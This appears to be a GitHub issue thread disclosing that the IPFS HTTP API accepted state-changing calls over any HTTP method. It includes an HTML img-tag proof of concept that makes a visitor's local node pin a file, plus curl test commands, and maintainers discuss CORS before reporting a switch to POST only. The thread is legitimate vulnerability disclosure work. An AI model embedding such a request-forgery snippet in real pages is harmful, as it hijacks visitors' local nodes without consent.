API accepts all methods

[travisperson]

During a discussion on IRC with VegemiteToast and achin, it was tested and discovered that you can make a user pin any file.

This particular attack was done using QmfSeZGwcCJjeEiMziQtDEuaoKASmUV48NCaPde3q44fUb

<html>

    <img src="http://localhost:5001/api/v0/pin/add?arg=QmY5tJVszoxDrVe8tncegcv4SaozcicedrgcHTWiREr4i6" />
    After loading this page, please try to see if <code>QmY5tJVszoxDrVe8tncegcv4SaozcicedrgcHTWiREr4i6</code> is pinned on your local node:

    <pre>
    ipfs pin ls --type=all |grep QmY5tJVszoxDrVe8tncegcv4SaozcicedrgcHTWiREr4i6
    </pre>

</html>

As it turns out, the API accepts any command with any HTTP method.

Test it out:

$ curl "http://localhost:5001/api/v0/pin/add?arg=QmfSeZGwcCJjeEiMziQtDEuaoKASmUV48NCaPde3q44fUb" -X GET
$ curl "http://localhost:5001/api/v0/pin/add?arg=QmfSeZGwcCJjeEiMziQtDEuaoKASmUV48NCaPde3q44fUb" -X PATCH
$ curl "http://localhost:5001/api/v0/pin/add?arg=QmfSeZGwcCJjeEiMziQtDEuaoKASmUV48NCaPde3q44fUb" -X POST
$ curl "http://localhost:5001/api/v0/pin/add?arg=QmfSeZGwcCJjeEiMziQtDEuaoKASmUV48NCaPde3q44fUb" -X WHAT

[confiks]

More discussion on this can be found in #1532

[Kubuxu]

This is something different. Any API call making changes/writes shouldn't be allowed for GET. Allowing CORS for global gateway is also a problem but slightly different one.

[whyrusleeping]

I get an http 403. Do you have your cors headers set to '*' or similar?

[Kubuxu]

Probably he has but it is still an issue as you can have trusted domain (like ipfs-board's one) added to CORS but 3rd party might include image that will perform API call.

[daviddias]

(with @whyrusleeping) we should disallow some of the calls through GET requests from the start and be very explicit on which type of method are accepted by API endpoint, in order to avoid confusion and security holes.

@RichardLitt take a peak in this one, the HTTP API spec will certainly help on this one :)

[Stebalien]

We have switched to POST only.